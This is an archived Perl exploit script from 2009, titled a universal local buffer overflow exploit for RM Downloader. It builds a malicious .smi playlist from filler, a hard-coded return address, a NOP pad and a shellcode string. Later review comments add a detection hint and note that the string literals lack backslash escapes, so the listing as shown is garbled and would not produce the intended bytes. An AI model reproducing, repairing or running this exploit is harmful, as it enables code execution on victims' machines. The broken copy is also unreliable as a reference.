# Title : RM Downloader (.smi File) Universal Local Buffer Overflow Exploit
# Published : 2009-05-01
# Author : Stack
#!/usr/bin/perl
# RM Downloader (.smi File) Universal Overflow Exploit
use strict;
use warnings;
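# Writes a single-line playlist file named "spl.smi" into the current
# directory. The line is laid out as:
#
#     filler . return-address string . pad . payload . filler . terminator
#
# NOTE(review): as rendered on this page none of the string literals below
# contain backslash escapes, so Perl treats every one of them as plain text.
# This listing is an archived copy and may not be verbatim.
#
# NOTE(review): the payload string is opaque; nothing on this page states
# what it does, so no behaviour is documented for it here.
#
# Defender view: the generated file is one abnormally long line inside a
# playlist. A .smi file of that shape is a plausible triage signal
# (presumably; verify against the affected product and version).

# Opaque payload string supplied by the original author.
my $shellcode =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x4b".
"x1dxa3xb6x83xebxfcxe2xf4xb7xf5xe7xb6x4bx1dx28xf3".
"x77x96xdfxb3x33x1cx4cx3dx04x05x28xe9x6bx1cx48xff".
"xc0x29x28xb7xa5x2cx63x2fxe7x99x63xc2x4cxdcx69xbb".
"x4axdfx48x42x70x49x87xb2x3exf8x28xe9x6fx1cx48xd0".
"xc0x11xe8x3dx14x01xa2x5dxc0x01x28xb7xa0x94xffx92".
"x4fxdex92x76x2fx96xe3x86xcexddxdbxbaxc0x5dxafx3d".
"x3bx01x0ex3dx23x15x48xbfxc0x9dx13xb6x4bx1dx28xde".
"x77x42x92x40x2bx4bx2ax4exc8xddxd8xe6x23xedx29xb2".
"x14x75x3bx48xc1x13xf4x49xacx7exc2xdax28x1dxa3xb6";

# Filler: the literal on the right repeated 26076 times.
my $junk = "x41" x 26076;

# Value the original author labels a "universal" return address.
my $eip = "x17x48xF8x01";

# Pad placed between the return-address string and the payload.
my $nops = "x90" x 24;

# Three-argument open with an explicit mode keeps the file name from being
# parsed for mode characters, and the result is checked so that a failed
# open stops the script instead of printing to an unopened handle.
my $out_file = 'spl.smi';
open(my $playlist, '>', $out_file)
    or die "Cannot open $out_file for writing: $!";

print {$playlist} $junk . $eip . $nops . $shellcode . $junk . "rn"
    or die "Cannot write to $out_file: $!";

# Buffered write errors only surface at close, so check it as well.
close($playlist)
    or die "Cannot close $out_file: $!";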